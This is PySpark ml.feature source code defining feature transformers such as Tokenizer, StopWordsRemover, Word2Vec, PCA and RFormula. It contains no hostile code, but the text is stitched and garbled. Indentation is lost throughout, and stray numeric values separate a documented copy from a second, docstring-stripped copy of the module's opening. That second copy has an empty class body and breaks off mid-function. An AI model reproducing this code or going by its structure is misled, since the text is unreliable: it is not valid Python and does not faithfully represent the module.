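# back to strings with an explicit ``labels`` array. ``sqlContext`` is assumed to be
# supplied by the caller; nothing here runs at import time.
def _index_to_string_example(sqlContext):
    df = sqlContext.createDataFrame([(0.0,), (2.0,), (1.0,)], ["indexed"])
    inverter = IndexToString(inputCol="indexed", outputCol="label", labels=["a", "b", "c"])
    # Each index selects the corresponding entry of ``labels``: 0.0 -> 'a', 2.0 -> 'c', 1.0 -> 'b'.
    return [row.label for row in inverter.transform(df).collect()]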
class StopWordsRemover(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
A feature transformer that filters out stop words from input.
    Note: null values from the input array are preserved unless null is explicitly added to stopWords.
"""
# a placeholder to make the stopwords show up in generated doc
stopWords = Param(Params._dummy(), "stopWords", "The words to be filtered out")
caseSensitive = Param(Params._dummy(), "caseSensitive", "whether to do a case sensitive " +
"comparison over the stop words")
@keyword_only
def __init__(self, inputCol=None, outputCol=None, stopWords=None,
caseSensitive=False):
"""
__init__(self, inputCol=None, outputCol=None, stopWords=None,\
                 caseSensitive=False)
"""
super(StopWordsRemover, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.StopWordsRemover",
self.uid)
self.stopWords = Param(self, "stopWords", "The words to be filtered out")
self.caseSensitive = Param(self, "caseSensitive", "whether to do a case " +
"sensitive comparison over the stop words")
stopWordsObj = _jvm().org.apache.spark.ml.feature.StopWords
defaultStopWords = stopWordsObj.English()
self._setDefault(stopWords=defaultStopWords)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None, stopWords=None,
caseSensitive=False):
"""
setParams(self, inputCol="input", outputCol="output", stopWords=None,\
caseSensitive=false)
Sets params for this StopWordRemover.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setStopWords(self, value):
"""
Specify the stopwords to be filtered.
"""
self._paramMap[self.stopWords] = value
return self
def getStopWords(self):
"""
Get the stopwords.
"""
return self.getOrDefault(self.stopWords)
def setCaseSensitive(self, value):
"""
Set whether to do a case sensitive comparison over the stop words
"""
self._paramMap[self.caseSensitive] = value
return self
def getCaseSensitive(self):
"""
Get whether to do a case sensitive comparison over the stop words.
"""
return self.getOrDefault(self.caseSensitive)
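

# Illustrative usage sketch (not part of the original module): filtering the default
# English stop words from a tokenized column. ``sqlContext`` is assumed to be supplied
# by the caller; nothing here runs at import time.
def _stop_words_remover_example(sqlContext):
    df = sqlContext.createDataFrame([(["a", "panda", "is", "an", "animal"],)], ["raw"])
    remover = StopWordsRemover(inputCol="raw", outputCol="filtered")
    # With the default English stop word list this keeps only ['panda', 'animal'].
    return remover.transform(df).head().filtered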
@inherit_doc
@ignore_unicode_prefix
class Tokenizer(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
A tokenizer that converts the input string to lowercase and then
splits it by white spaces.
>>> df = sqlContext.createDataFrame([("a b c",)], ["text"])
>>> tokenizer = Tokenizer(inputCol="text", outputCol="words")
>>> tokenizer.transform(df).head()
Row(text=u'a b c', words=[u'a', u'b', u'c'])
>>> # Change a parameter.
>>> tokenizer.setParams(outputCol="tokens").transform(df).head()
Row(text=u'a b c', tokens=[u'a', u'b', u'c'])
>>> # Temporarily modify a parameter.
>>> tokenizer.transform(df, {tokenizer.outputCol: "words"}).head()
Row(text=u'a b c', words=[u'a', u'b', u'c'])
>>> tokenizer.transform(df).head()
Row(text=u'a b c', tokens=[u'a', u'b', u'c'])
>>> # Must use keyword arguments to specify params.
>>> tokenizer.setParams("text")
Traceback (most recent call last):
...
TypeError: Method setParams forces keyword arguments.
"""
@keyword_only
def __init__(self, inputCol=None, outputCol=None):
"""
__init__(self, inputCol=None, outputCol=None)
"""
super(Tokenizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Tokenizer", self.uid)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None):
"""
setParams(self, inputCol="input", outputCol="output")
Sets params for this Tokenizer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
@inherit_doc
class VectorAssembler(JavaTransformer, HasInputCols, HasOutputCol):
"""
.. note:: Experimental
A feature transformer that merges multiple columns into a vector column.
>>> df = sqlContext.createDataFrame([(1, 0, 3)], ["a", "b", "c"])
>>> vecAssembler = VectorAssembler(inputCols=["a", "b", "c"], outputCol="features")
>>> vecAssembler.transform(df).head().features
DenseVector([1.0, 0.0, 3.0])
>>> vecAssembler.setParams(outputCol="freqs").transform(df).head().freqs
DenseVector([1.0, 0.0, 3.0])
>>> params = {vecAssembler.inputCols: ["b", "a"], vecAssembler.outputCol: "vector"}
>>> vecAssembler.transform(df, params).head().vector
DenseVector([0.0, 1.0])
"""
@keyword_only
def __init__(self, inputCols=None, outputCol=None):
"""
__init__(self, inputCols=None, outputCol=None)
"""
super(VectorAssembler, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.VectorAssembler", self.uid)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCols=None, outputCol=None):
"""
setParams(self, inputCols=None, outputCol=None)
Sets params for this VectorAssembler.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
@inherit_doc
class VectorIndexer(JavaEstimator, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
    Class for indexing categorical feature columns in a dataset of `Vector`.
This has 2 usage modes:
- Automatically identify categorical features (default behavior)
- This helps process a dataset of unknown vectors into a dataset with some continuous
features and some categorical features. The choice between continuous and categorical
is based upon a maxCategories parameter.
      - Set maxCategories to the maximum number of categories any categorical feature should
        have.
- E.g.: Feature 0 has unique values {-1.0, 0.0}, and feature 1 values {1.0, 3.0, 5.0}.
If maxCategories = 2, then feature 0 will be declared categorical and use indices {0, 1},
and feature 1 will be declared continuous.
- Index all features, if all features are categorical
- If maxCategories is set to be very large, then this will build an index of unique
values for all features.
- Warning: This can cause problems if features are continuous since this will collect ALL
unique values to the driver.
- E.g.: Feature 0 has unique values {-1.0, 0.0}, and feature 1 values {1.0, 3.0, 5.0}.
If maxCategories >= 3, then both features will be declared categorical.
This returns a model which can transform categorical features to use 0-based indices.
Index stability:
- This is not guaranteed to choose the same category index across multiple runs.
- If a categorical feature includes value 0, then this is guaranteed to map value 0 to
index 0. This maintains vector sparsity.
- More stability may be added in the future.
TODO: Future extensions: The following functionality is planned for the future:
- Preserve metadata in transform; if a feature's metadata is already present,
do not recompute.
- Specify certain features to not index, either via a parameter or via existing metadata.
- Add warning if a categorical feature has only 1 category.
- Add option for allowing unknown categories.
>>> from pyspark.mllib.linalg import Vectors
>>> df = sqlContext.createDataFrame([(Vectors.dense([-1.0, 0.0]),),
... (Vectors.dense([0.0, 1.0]),), (Vectors.dense([0.0, 2.0]),)], ["a"])
>>> indexer = VectorIndexer(maxCategories=2, inputCol="a", outputCol="indexed")
>>> model = indexer.fit(df)
>>> model.transform(df).head().indexed
DenseVector([1.0, 0.0])
>>> indexer.setParams(outputCol="test").fit(df).transform(df).collect()[1].test
DenseVector([0.0, 1.0])
>>> params = {indexer.maxCategories: 3, indexer.outputCol: "vector"}
>>> model2 = indexer.fit(df, params)
>>> model2.transform(df).head().vector
DenseVector([1.0, 0.0])
"""
# a placeholder to make it appear in the generated doc
maxCategories = Param(Params._dummy(), "maxCategories",
"Threshold for the number of values a categorical feature can take " +
"(>= 2). If a feature is found to have > maxCategories values, then " +
"it is declared continuous.")
@keyword_only
def __init__(self, maxCategories=20, inputCol=None, outputCol=None):
"""
__init__(self, maxCategories=20, inputCol=None, outputCol=None)
"""
super(VectorIndexer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.VectorIndexer", self.uid)
self.maxCategories = Param(self, "maxCategories",
"Threshold for the number of values a categorical feature " +
"can take (>= 2). If a feature is found to have " +
"> maxCategories values, then it is declared continuous.")
self._setDefault(maxCategories=20)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, maxCategories=20, inputCol=None, outputCol=None):
"""
setParams(self, maxCategories=20, inputCol=None, outputCol=None)
Sets params for this VectorIndexer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setMaxCategories(self, value):
"""
Sets the value of :py:attr:`maxCategories`.
"""
self._paramMap[self.maxCategories] = value
return self
def getMaxCategories(self):
"""
Gets the value of maxCategories or its default value.
"""
return self.getOrDefault(self.maxCategories)
def _create_model(self, java_model):
return VectorIndexerModel(java_model)
class VectorIndexerModel(JavaModel):
"""
.. note:: Experimental
Model fitted by VectorIndexer.
"""
@inherit_doc
class VectorSlicer(JavaTransformer, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
This class takes a feature vector and outputs a new feature vector with a subarray
of the original features.
The subset of features can be specified with either indices (`setIndices()`)
or names (`setNames()`). At least one feature must be selected. Duplicate features
are not allowed, so there can be no overlap between selected indices and names.
The output vector will order features with the selected indices first (in the order given),
followed by the selected names (in the order given).
>>> from pyspark.mllib.linalg import Vectors
>>> df = sqlContext.createDataFrame([
... (Vectors.dense([-2.0, 2.3, 0.0, 0.0, 1.0]),),
... (Vectors.dense([0.0, 0.0, 0.0, 0.0, 0.0]),),
... (Vectors.dense([0.6, -1.1, -3.0, 4.5, 3.3]),)], ["features"])
>>> vs = VectorSlicer(inputCol="features", outputCol="sliced", indices=[1, 4])
>>> vs.transform(df).head().sliced
DenseVector([2.3, 1.0])
"""
# a placeholder to make it appear in the generated doc
indices = Param(Params._dummy(), "indices", "An array of indices to select features from " +
"a vector column. There can be no overlap with names.")
names = Param(Params._dummy(), "names", "An array of feature names to select features from " +
"a vector column. These names must be specified by ML " +
"org.apache.spark.ml.attribute.Attribute. There can be no overlap with " +
"indices.")
@keyword_only
def __init__(self, inputCol=None, outputCol=None, indices=None, names=None):
"""
__init__(self, inputCol=None, outputCol=None, indices=None, names=None)
"""
super(VectorSlicer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.VectorSlicer", self.uid)
self.indices = Param(self, "indices", "An array of indices to select features from " +
"a vector column. There can be no overlap with names.")
self.names = Param(self, "names", "An array of feature names to select features from " +
"a vector column. These names must be specified by ML " +
"org.apache.spark.ml.attribute.Attribute. There can be no overlap " +
"with indices.")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inputCol=None, outputCol=None, indices=None, names=None):
"""
setParams(self, inputCol=None, outputCol=None, indices=None, names=None):
Sets params for this VectorSlicer.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setIndices(self, value):
"""
Sets the value of :py:attr:`indices`.
"""
self._paramMap[self.indices] = value
return self
def getIndices(self):
"""
Gets the value of indices or its default value.
"""
return self.getOrDefault(self.indices)
def setNames(self, value):
"""
Sets the value of :py:attr:`names`.
"""
self._paramMap[self.names] = value
return self
def getNames(self):
"""
Gets the value of names or its default value.
"""
return self.getOrDefault(self.names)
@inherit_doc
@ignore_unicode_prefix
class Word2Vec(JavaEstimator, HasStepSize, HasMaxIter, HasSeed, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
    Word2Vec trains a model of `Map(String, Vector)`, i.e. it transforms a word into a
    vector code for use in further natural language processing or machine learning.
>>> sent = ("a b " * 100 + "a c " * 10).split(" ")
>>> doc = sqlContext.createDataFrame([(sent,), (sent,)], ["sentence"])
>>> model = Word2Vec(vectorSize=5, seed=42, inputCol="sentence", outputCol="model").fit(doc)
>>> model.getVectors().show()
+----+--------------------+
|word| vector|
+----+--------------------+
| a|[-0.3511952459812...|
| b|[0.29077222943305...|
| c|[0.02315592765808...|
+----+--------------------+
...
>>> model.findSynonyms("a", 2).show()
+----+-------------------+
|word| similarity|
+----+-------------------+
| b|0.29255685145799626|
| c|-0.5414068302988307|
+----+-------------------+
...
>>> model.transform(doc).head().model
DenseVector([-0.0422, -0.5138, -0.2546, 0.6885, 0.276])
"""
# a placeholder to make it appear in the generated doc
vectorSize = Param(Params._dummy(), "vectorSize",
"the dimension of codes after transforming from words")
numPartitions = Param(Params._dummy(), "numPartitions",
"number of partitions for sentences of words")
minCount = Param(Params._dummy(), "minCount",
"the minimum number of times a token must appear to be included in the " +
"word2vec model's vocabulary")
@keyword_only
def __init__(self, vectorSize=100, minCount=5, numPartitions=1, stepSize=0.025, maxIter=1,
seed=None, inputCol=None, outputCol=None):
"""
__init__(self, vectorSize=100, minCount=5, numPartitions=1, stepSize=0.025, maxIter=1, \
seed=None, inputCol=None, outputCol=None)
"""
super(Word2Vec, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Word2Vec", self.uid)
self.vectorSize = Param(self, "vectorSize",
"the dimension of codes after transforming from words")
self.numPartitions = Param(self, "numPartitions",
"number of partitions for sentences of words")
self.minCount = Param(self, "minCount",
"the minimum number of times a token must appear to be included " +
"in the word2vec model's vocabulary")
self._setDefault(vectorSize=100, minCount=5, numPartitions=1, stepSize=0.025, maxIter=1,
seed=None)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, vectorSize=100, minCount=5, numPartitions=1, stepSize=0.025, maxIter=1,
seed=None, inputCol=None, outputCol=None):
"""
        setParams(self, vectorSize=100, minCount=5, numPartitions=1, stepSize=0.025, maxIter=1, \
                  seed=None, inputCol=None, outputCol=None)
Sets params for this Word2Vec.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setVectorSize(self, value):
"""
Sets the value of :py:attr:`vectorSize`.
"""
self._paramMap[self.vectorSize] = value
return self
def getVectorSize(self):
"""
Gets the value of vectorSize or its default value.
"""
return self.getOrDefault(self.vectorSize)
def setNumPartitions(self, value):
"""
Sets the value of :py:attr:`numPartitions`.
"""
self._paramMap[self.numPartitions] = value
return self
def getNumPartitions(self):
"""
Gets the value of numPartitions or its default value.
"""
return self.getOrDefault(self.numPartitions)
def setMinCount(self, value):
"""
Sets the value of :py:attr:`minCount`.
"""
self._paramMap[self.minCount] = value
return self
def getMinCount(self):
"""
Gets the value of minCount or its default value.
"""
return self.getOrDefault(self.minCount)
def _create_model(self, java_model):
return Word2VecModel(java_model)
class Word2VecModel(JavaModel):
"""
.. note:: Experimental
Model fitted by Word2Vec.
"""
def getVectors(self):
"""
Returns the vector representation of the words as a dataframe
with two fields, word and vector.
"""
return self._call_java("getVectors")
def findSynonyms(self, word, num):
"""
Find "num" number of words closest in similarity to "word".
word can be a string or vector representation.
Returns a dataframe with two fields word and similarity (which
gives the cosine similarity).
"""
if not isinstance(word, basestring):
word = _convert_to_vector(word)
return self._call_java("findSynonyms", word, num)
@inherit_doc
class PCA(JavaEstimator, HasInputCol, HasOutputCol):
"""
.. note:: Experimental
PCA trains a model to project vectors to a low-dimensional space using PCA.
>>> from pyspark.mllib.linalg import Vectors
>>> data = [(Vectors.sparse(5, [(1, 1.0), (3, 7.0)]),),
... (Vectors.dense([2.0, 0.0, 3.0, 4.0, 5.0]),),
... (Vectors.dense([4.0, 0.0, 0.0, 6.0, 7.0]),)]
>>> df = sqlContext.createDataFrame(data,["features"])
>>> pca = PCA(k=2, inputCol="features", outputCol="pca_features")
>>> model = pca.fit(df)
>>> model.transform(df).collect()[0].pca_features
DenseVector([1.648..., -4.013...])
"""
# a placeholder to make it appear in the generated doc
k = Param(Params._dummy(), "k", "the number of principal components")
@keyword_only
def __init__(self, k=None, inputCol=None, outputCol=None):
"""
__init__(self, k=None, inputCol=None, outputCol=None)
"""
super(PCA, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.PCA", self.uid)
self.k = Param(self, "k", "the number of principal components")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, k=None, inputCol=None, outputCol=None):
"""
setParams(self, k=None, inputCol=None, outputCol=None)
Set params for this PCA.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setK(self, value):
"""
Sets the value of :py:attr:`k`.
"""
self._paramMap[self.k] = value
return self
def getK(self):
"""
Gets the value of k or its default value.
"""
return self.getOrDefault(self.k)
def _create_model(self, java_model):
return PCAModel(java_model)
class PCAModel(JavaModel):
"""
.. note:: Experimental
Model fitted by PCA.
"""
@inherit_doc
class RFormula(JavaEstimator, HasFeaturesCol, HasLabelCol):
"""
.. note:: Experimental
Implements the transforms required for fitting a dataset against an
R model formula. Currently we support a limited subset of the R
operators, including '~', '+', '-', and '.'. Also see the R formula
docs:
http://stat.ethz.ch/R-manual/R-patched/library/stats/html/formula.html
>>> df = sqlContext.createDataFrame([
... (1.0, 1.0, "a"),
... (0.0, 2.0, "b"),
... (0.0, 0.0, "a")
... ], ["y", "x", "s"])
>>> rf = RFormula(formula="y ~ x + s")
>>> rf.fit(df).transform(df).show()
+---+---+---+---------+-----+
| y| x| s| features|label|
+---+---+---+---------+-----+
|1.0|1.0| a|[1.0,1.0]| 1.0|
|0.0|2.0| b|[2.0,0.0]| 0.0|
|0.0|0.0| a|[0.0,1.0]| 0.0|
+---+---+---+---------+-----+
...
>>> rf.fit(df, {rf.formula: "y ~ . - s"}).transform(df).show()
+---+---+---+--------+-----+
| y| x| s|features|label|
+---+---+---+--------+-----+
|1.0|1.0| a| [1.0]| 1.0|
|0.0|2.0| b| [2.0]| 0.0|
|0.0|0.0| a| [0.0]| 0.0|
+---+---+---+--------+-----+
...
"""
# a placeholder to make it appear in the generated doc
formula = Param(Params._dummy(), "formula", "R model formula")
@keyword_only
def __init__(self, formula=None, featuresCol="features", labelCol="label"):
"""
__init__(self, formula=None, featuresCol="features", labelCol="label")
"""
super(RFormula, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.RFormula", self.uid)
self.formula = Param(self, "formula", "R model formula")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, formula=None, featuresCol="features", labelCol="label"):
"""
setParams(self, formula=None, featuresCol="features", labelCol="label")
Sets params for RFormula.
"""
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setFormula(self, value):
"""
Sets the value of :py:attr:`formula`.
"""
self._paramMap[self.formula] = value
return self
def getFormula(self):
"""
Gets the value of :py:attr:`formula`.
"""
return self.getOrDefault(self.formula)
def _create_model(self, java_model):
return RFormulaModel(java_model)
class RFormulaModel(JavaModel):
"""
.. note:: Experimental
Model fitted by :py:class:`RFormula`.
"""
if __name__ == "__main__":
import doctest
from pyspark.context import SparkContext
from pyspark.sql import Row, SQLContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
sc = SparkContext("local[2]", "ml.feature tests")
sqlContext = SQLContext(sc)
globs['sc'] = sc
globs['sqlContext'] = sqlContext
testData = sc.parallelize([Row(id=0, label="a"), Row(id=1, label="b"),
Row(id=2, label="c"), Row(id=3, label="a"),
Row(id=4, label="a"), Row(id=5, label="c")], 2)
globs['stringIndDf'] = sqlContext.createDataFrame(testData)
(failure_count, test_count) = doctest.testmod(globs=globs, optionflags=doctest.ELLIPSIS)
sc.stop()
if failure_count:
exit(-1)
| 37.206592
| 100
| 0.619119
|
import sys
if sys.version > '3':
basestring = str
from pyspark.rdd import ignore_unicode_prefix
from pyspark.ml.param.shared import *
from pyspark.ml.util import keyword_only
from pyspark.ml.wrapper import JavaEstimator, JavaModel, JavaTransformer, _jvm
from pyspark.mllib.common import inherit_doc
from pyspark.mllib.linalg import _convert_to_vector
__all__ = ['Binarizer', 'Bucketizer', 'DCT', 'ElementwiseProduct', 'HashingTF', 'IDF', 'IDFModel',
'IndexToString', 'NGram', 'Normalizer', 'OneHotEncoder', 'PCA', 'PCAModel',
'PolynomialExpansion', 'RegexTokenizer', 'RFormula', 'RFormulaModel', 'SQLTransformer',
'StandardScaler', 'StandardScalerModel', 'StopWordsRemover', 'StringIndexer',
'StringIndexerModel', 'Tokenizer', 'VectorAssembler', 'VectorIndexer', 'VectorSlicer',
'Word2Vec', 'Word2VecModel']
@inherit_doc
class Binarizer(JavaTransformer, HasInputCol, HasOutputCol):
threshold = Param(Params._dummy(), "threshold",
"threshold in binary classification prediction, in range [0, 1]")
@keyword_only
def __init__(self, threshold=0.0, inputCol=None, outputCol=None):
super(Binarizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Binarizer", self.uid)
self.threshold = Param(self, "threshold",
"threshold in binary classification prediction, in range [0, 1]")
self._setDefault(threshold=0.0)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, threshold=0.0, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setThreshold(self, value):
self._paramMap[self.threshold] = value
return self
def getThreshold(self):
return self.getOrDefault(self.threshold)
@inherit_doc
class Bucketizer(JavaTransformer, HasInputCol, HasOutputCol):
splits = \
Param(Params._dummy(), "splits",
"Split points for mapping continuous features into buckets. With n+1 splits, " +
"there are n buckets. A bucket defined by splits x,y holds values in the " +
"range [x,y) except the last bucket, which also includes y. The splits " +
"should be strictly increasing. Values at -inf, inf must be explicitly " +
"provided to cover all Double values; otherwise, values outside the splits " +
"specified will be treated as errors.")
@keyword_only
def __init__(self, splits=None, inputCol=None, outputCol=None):
super(Bucketizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Bucketizer", self.uid)
self.splits = \
Param(self, "splits",
"Split points for mapping continuous features into buckets. With n+1 splits, " +
"there are n buckets. A bucket defined by splits x,y holds values in the " +
"range [x,y) except the last bucket, which also includes y. The splits " +
"should be strictly increasing. Values at -inf, inf must be explicitly " +
"provided to cover all Double values; otherwise, values outside the splits " +
"specified will be treated as errors.")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, splits=None, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setSplits(self, value):
self._paramMap[self.splits] = value
return self
def getSplits(self):
return self.getOrDefault(self.splits)
@inherit_doc
class DCT(JavaTransformer, HasInputCol, HasOutputCol):
inverse = Param(Params._dummy(), "inverse", "Set transformer to perform inverse DCT, " +
"default False.")
@keyword_only
def __init__(self, inverse=False, inputCol=None, outputCol=None):
super(DCT, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.DCT", self.uid)
self.inverse = Param(self, "inverse", "Set transformer to perform inverse DCT, " +
"default False.")
self._setDefault(inverse=False)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, inverse=False, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setInverse(self, value):
self._paramMap[self.inverse] = value
return self
def getInverse(self):
return self.getOrDefault(self.inverse)
@inherit_doc
class ElementwiseProduct(JavaTransformer, HasInputCol, HasOutputCol):
scalingVec = Param(Params._dummy(), "scalingVec", "vector for hadamard product, " +
"it must be MLlib Vector type.")
@keyword_only
def __init__(self, scalingVec=None, inputCol=None, outputCol=None):
super(ElementwiseProduct, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.ElementwiseProduct",
self.uid)
self.scalingVec = Param(self, "scalingVec", "vector for hadamard product, " +
"it must be MLlib Vector type.")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, scalingVec=None, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setScalingVec(self, value):
self._paramMap[self.scalingVec] = value
return self
def getScalingVec(self):
return self.getOrDefault(self.scalingVec)
@inherit_doc
class HashingTF(JavaTransformer, HasInputCol, HasOutputCol, HasNumFeatures):
@keyword_only
def __init__(self, numFeatures=1 << 18, inputCol=None, outputCol=None):
super(HashingTF, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.HashingTF", self.uid)
self._setDefault(numFeatures=1 << 18)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, numFeatures=1 << 18, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
@inherit_doc
class IDF(JavaEstimator, HasInputCol, HasOutputCol):
minDocFreq = Param(Params._dummy(), "minDocFreq",
"minimum of documents in which a term should appear for filtering")
@keyword_only
def __init__(self, minDocFreq=0, inputCol=None, outputCol=None):
super(IDF, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.IDF", self.uid)
self.minDocFreq = Param(self, "minDocFreq",
"minimum of documents in which a term should appear for filtering")
self._setDefault(minDocFreq=0)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, minDocFreq=0, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setMinDocFreq(self, value):
self._paramMap[self.minDocFreq] = value
return self
def getMinDocFreq(self):
return self.getOrDefault(self.minDocFreq)
def _create_model(self, java_model):
return IDFModel(java_model)
class IDFModel(JavaModel):
@inherit_doc
@ignore_unicode_prefix
class NGram(JavaTransformer, HasInputCol, HasOutputCol):
n = Param(Params._dummy(), "n", "number of elements per n-gram (>=1)")
@keyword_only
def __init__(self, n=2, inputCol=None, outputCol=None):
super(NGram, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.NGram", self.uid)
self.n = Param(self, "n", "number of elements per n-gram (>=1)")
self._setDefault(n=2)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, n=2, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setN(self, value):
self._paramMap[self.n] = value
return self
def getN(self):
return self.getOrDefault(self.n)
@inherit_doc
class Normalizer(JavaTransformer, HasInputCol, HasOutputCol):
p = Param(Params._dummy(), "p", "the p norm value.")
@keyword_only
def __init__(self, p=2.0, inputCol=None, outputCol=None):
super(Normalizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.Normalizer", self.uid)
self.p = Param(self, "p", "the p norm value.")
self._setDefault(p=2.0)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, p=2.0, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setP(self, value):
self._paramMap[self.p] = value
return self
def getP(self):
return self.getOrDefault(self.p)
@inherit_doc
class OneHotEncoder(JavaTransformer, HasInputCol, HasOutputCol):
dropLast = Param(Params._dummy(), "dropLast", "whether to drop the last category")
@keyword_only
def __init__(self, dropLast=True, inputCol=None, outputCol=None):
super(OneHotEncoder, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.OneHotEncoder", self.uid)
self.dropLast = Param(self, "dropLast", "whether to drop the last category")
self._setDefault(dropLast=True)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, dropLast=True, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setDropLast(self, value):
self._paramMap[self.dropLast] = value
return self
def getDropLast(self):
return self.getOrDefault(self.dropLast)
@inherit_doc
class PolynomialExpansion(JavaTransformer, HasInputCol, HasOutputCol):
degree = Param(Params._dummy(), "degree", "the polynomial degree to expand (>= 1)")
@keyword_only
def __init__(self, degree=2, inputCol=None, outputCol=None):
super(PolynomialExpansion, self).__init__()
self._java_obj = self._new_java_obj(
"org.apache.spark.ml.feature.PolynomialExpansion", self.uid)
self.degree = Param(self, "degree", "the polynomial degree to expand (>= 1)")
self._setDefault(degree=2)
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, degree=2, inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setDegree(self, value):
self._paramMap[self.degree] = value
return self
def getDegree(self):
return self.getOrDefault(self.degree)
@inherit_doc
@ignore_unicode_prefix
class RegexTokenizer(JavaTransformer, HasInputCol, HasOutputCol):
minTokenLength = Param(Params._dummy(), "minTokenLength", "minimum token length (>= 0)")
gaps = Param(Params._dummy(), "gaps", "whether regex splits on gaps (True) or matches tokens")
pattern = Param(Params._dummy(), "pattern", "regex pattern (Java dialect) used for tokenizing")
@keyword_only
def __init__(self, minTokenLength=1, gaps=True, pattern="\\s+", inputCol=None, outputCol=None):
super(RegexTokenizer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.RegexTokenizer", self.uid)
self.minTokenLength = Param(self, "minTokenLength", "minimum token length (>= 0)")
self.gaps = Param(self, "gaps", "whether regex splits on gaps (True) or matches tokens")
self.pattern = Param(self, "pattern", "regex pattern (Java dialect) used for tokenizing")
self._setDefault(minTokenLength=1, gaps=True, pattern="\\s+")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, minTokenLength=1, gaps=True, pattern="\\s+", inputCol=None, outputCol=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setMinTokenLength(self, value):
self._paramMap[self.minTokenLength] = value
return self
def getMinTokenLength(self):
return self.getOrDefault(self.minTokenLength)
def setGaps(self, value):
self._paramMap[self.gaps] = value
return self
def getGaps(self):
return self.getOrDefault(self.gaps)
def setPattern(self, value):
self._paramMap[self.pattern] = value
return self
def getPattern(self):
return self.getOrDefault(self.pattern)
@inherit_doc
class SQLTransformer(JavaTransformer):
statement = Param(Params._dummy(), "statement", "SQL statement")
@keyword_only
def __init__(self, statement=None):
super(SQLTransformer, self).__init__()
self._java_obj = self._new_java_obj("org.apache.spark.ml.feature.SQLTransformer", self.uid)
self.statement = Param(self, "statement", "SQL statement")
kwargs = self.__init__._input_kwargs
self.setParams(**kwargs)
@keyword_only
def setParams(self, statement=None):
kwargs = self.setParams._input_kwargs
return self._set(**kwargs)
def setStatement(self, value):
self._paramMap[self.statement] = value
return self
def getStatement(self):
